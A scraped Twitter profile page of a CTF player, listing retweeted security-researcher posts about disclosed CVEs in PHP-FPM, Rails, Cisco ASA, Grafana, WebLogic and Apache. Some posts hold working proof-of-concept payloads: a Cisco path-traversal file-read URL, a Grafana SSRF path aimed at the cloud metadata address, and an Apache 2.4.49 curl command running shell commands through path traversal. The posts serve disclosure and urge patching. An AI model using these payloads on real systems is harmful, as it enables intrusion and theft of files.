And (@d90pwn) 's Twitter Profile
And

@d90pwn

LC↯BC / MSLC CTF player

ID: 717111109

calendar_today26-07-2012 01:10:02

321 Tweet

928 Takipçi

116 Takip Edilen

Omar "Beched" Ganiev (@thebeched) 's Twitter Profile Photo

Freshly patched RCE in PHP-FPM: bugs.php.net/bug.php?id=785… Exploit: github.com/neex/phuip-fpi… Many nginx+PHP configurations vulnerable, watch out!

Cyber Advising (@cyber_advising) 's Twitter Profile Photo

CVE-2020-8163 - Remote code execution of user-provided local names in Rails Versions Affected: rails < 5.0.1 - Fixed Versions: 4.2.11.2 PoC github.com/sh286/CVE-2020…

CVE-2020-8163 - Remote code execution of user-provided local names in Rails

Versions Affected: rails &lt; 5.0.1 -  Fixed Versions: 4.2.11.2

PoC
github.com/sh286/CVE-2020…
Ahmed Aboul-Ela (@aboul3la) 's Twitter Profile Photo

Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower. For example to read "/+CSCOE+/portal_inc.lua" file. https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ Happy Hacking!

Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA &amp; Cisco Firepower.

For example to read "/+CSCOE+/portal_inc.lua" file.

https://&lt;domain&gt;/+CSCOT+/translation-table?type=mst&amp;textdomain=/%2bCSCOE%2b/portal_inc.lua&amp;default-language&amp;lang=../

Happy Hacking!
Pavel Zhovner (@zhovner) 's Twitter Profile Photo

Thank you all so much, that’s incredible, I’m just speechless. We will try very hard and do our best at the production stage to make sure everyone gets Flipper on time. These two days were just crazy and I need to get some sleep now. See ya soon. P.S check the new skin out

Thank you all so much, that’s incredible, I’m just speechless.

We will try very hard and do our best at the production stage to make sure everyone gets Flipper on time. These two days were just crazy and I need to get some sleep now. See ya soon. P.S check the new skin out
Ben Sadeghipour (@nahamsec) 's Twitter Profile Photo

Check out Justin Gardner's blog post on CVE-2020-13379: Unauthenticated SSRF in Grafana! rhynorater.github.io/CVE-2020-13379… POC: /avatar/tesdt%3Fd=redirect.rhynorater.com%25253f%253b%https://t.co/tpG2O3i9Bj%252f169.254.169.254

Check out <a href="/Rhynorater/">Justin Gardner</a>'s blog post on CVE-2020-13379: Unauthenticated SSRF in Grafana!  

rhynorater.github.io/CVE-2020-13379…

POC:

/avatar/tesdt%3Fd=redirect.rhynorater.com%25253f%253b%https://t.co/tpG2O3i9Bj%252f169.254.169.254
Janggggg (@testanull) 's Twitter Profile Photo

Analysis of CVE-2020-14882 Weblogic RCE via HTTP CVSS 9.8/10 Hope you enjoy it ;) Thanks an anonymous man for supporting! testbnull.medium.com/weblogic-rce-b…

Nguyen The Duc (@ducnt_) 's Twitter Profile Photo

TetCTF2021: I have a Web⚔️Crypto: Next-Gen Proxy challenge. It's get inspired by great research of Joshua Maddux was presentation in BlackHat USA 2020. It's about TLS + SSRF = RCE. Also, here is my slide included in the flag of this: shorturl.at/cquJ7 Happy hacking new year.

TetCTF2021: I have a Web⚔️Crypto: Next-Gen Proxy challenge. It's get inspired by great research of <a href="/joshmdx/">Joshua Maddux</a> was presentation in BlackHat USA 2020. It's about TLS + SSRF = RCE. Also, here is my slide included in the flag of this: shorturl.at/cquJ7

Happy hacking new year.
hackerfantastic.x (@hackerfantastic) 's Twitter Profile Photo

Here's how to run full commands with arguments via CVE-2021-41773 via a path traversal vulnerability in the event mod-cgi is enabled on Apache 2.4.49 curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv Patch urgently.

Here's how to run full commands with arguments via CVE-2021-41773 via a path traversal vulnerability in the event mod-cgi is enabled on Apache 2.4.49

curl --data "A=|id&gt;&gt;/tmp/x;uname\$IFS-a&gt;&gt;/tmp/x" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv

Patch urgently.